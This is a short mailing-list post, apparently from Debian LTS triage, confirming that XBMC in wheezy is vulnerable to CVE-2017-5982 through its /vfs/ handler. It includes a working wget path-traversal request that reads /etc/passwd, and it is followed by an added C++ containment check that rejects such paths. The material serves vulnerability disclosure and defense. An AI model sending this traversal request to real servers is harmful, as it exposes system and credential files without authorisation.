XBMC CVE-2017-5982
Just confirmed (after a reasonable amount of time) that XBMC in wheezy
is vulnerable to CVE-2017-5982 although the exploit is different.
When XBMC is run as root (yes, probably bad idea, this is a VM for
testing):
http://192.168.122.47/vfs/special://masterprofile/Thumbnails/Video/f/auto-f4b8e6fd.tbn
retrieves:
/root/.xbmc/userdata/Thumbnails/Video/f/auto-f4b8e6fd.tbn
Or:
wget 'http://192.168.122.47/vfs/special://masterprofile/Thumbnails/Video/f/../../../../../../etc/passwd'
Downloads - guess what?
/etc/passwd
This was marked as "unreproducible" for 2:12.3+dfsg1-3ubuntu1 in
dla-needed.txt, however I have a suspicion that is incorrect.
However, the information for CVE-2017-5982 is for /image, not /vfs.
--
Brian May <brian@linuxpenguins.xyz>
https://linuxpenguins.xyz/brian/
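
A lexical containment check for the `special://masterprofile/` resolution described in the message above, as an added example that is not part of the original post and not XBMC's own code. The names `resolve_vfs`, `pct_decode`, `hex_val`, `kScheme` and `kBase` are hypothetical, and the base directory is an assumption taken from the two paths the post shows.

```cpp
#include <cstdio>
#include <string>
#include <vector>
// Assumed mapping, taken from the two paths shown in the post.
static const std::string kScheme = "special://masterprofile/";
static const std::string kBase = "/root/.xbmc/userdata";

static int hex_val(char c) {
    if (c >= '0' && c <= '9') return c - '0';
    if (c >= 'a' && c <= 'f') return c - 'a' + 10;
    return (c >= 'A' && c <= 'F') ? c - 'A' + 10 : -1;
}

// Decode %XX once; reject malformed escapes and encoded NUL bytes.
static bool pct_decode(const std::string& in, std::string& out) {
    out.clear();
    for (std::string::size_type i = 0; i < in.size(); ++i) {
        if (in[i] != '%') { out += in[i]; continue; }
        if (i + 2 >= in.size()) return false;
        const int hi = hex_val(in[i + 1]), lo = hex_val(in[i + 2]);
        if (hi < 0 || lo < 0 || hi + lo == 0) return false;
        out += static_cast<char>(hi * 16 + lo);
        i += 2;
    }
    return true;
}

// Lexically resolve a /vfs/ target; false if it leaves kScheme or climbs above kBase.
bool resolve_vfs(const std::string& target, std::string& resolved) {
    std::string decoded, seg;
    if (!pct_decode(target, decoded) || decoded.compare(0, kScheme.size(), kScheme) != 0) return false;
    std::vector<std::string> parts;
    const std::string rest = decoded.substr(kScheme.size()) + "/";
    for (std::string::size_type i = 0; i < rest.size(); ++i) {
        if (rest[i] != '/') { seg += rest[i]; continue; }
        if (seg == ".." && parts.empty()) return false;  // would climb above kBase
        if (seg == "..") parts.pop_back();
        else if (!seg.empty() && seg != ".") parts.push_back(seg);
        seg.clear();
    }
    resolved = kBase;
    for (std::string::size_type i = 0; i < parts.size(); ++i) resolved += "/" + parts[i];
    return true;
}

int main() {
    std::string p;  // the traversal target from the post is expected to print "rejected"
    std::printf("%s\n", resolve_vfs(kScheme + "Thumbnails/Video/f/../../../../../../etc/passwd", p) ? p.c_str() : "rejected");
}
```

The check is lexical only, so a symlink inside the base directory can still point outside it; a real handler would also compare the canonicalised path against the base before opening the file.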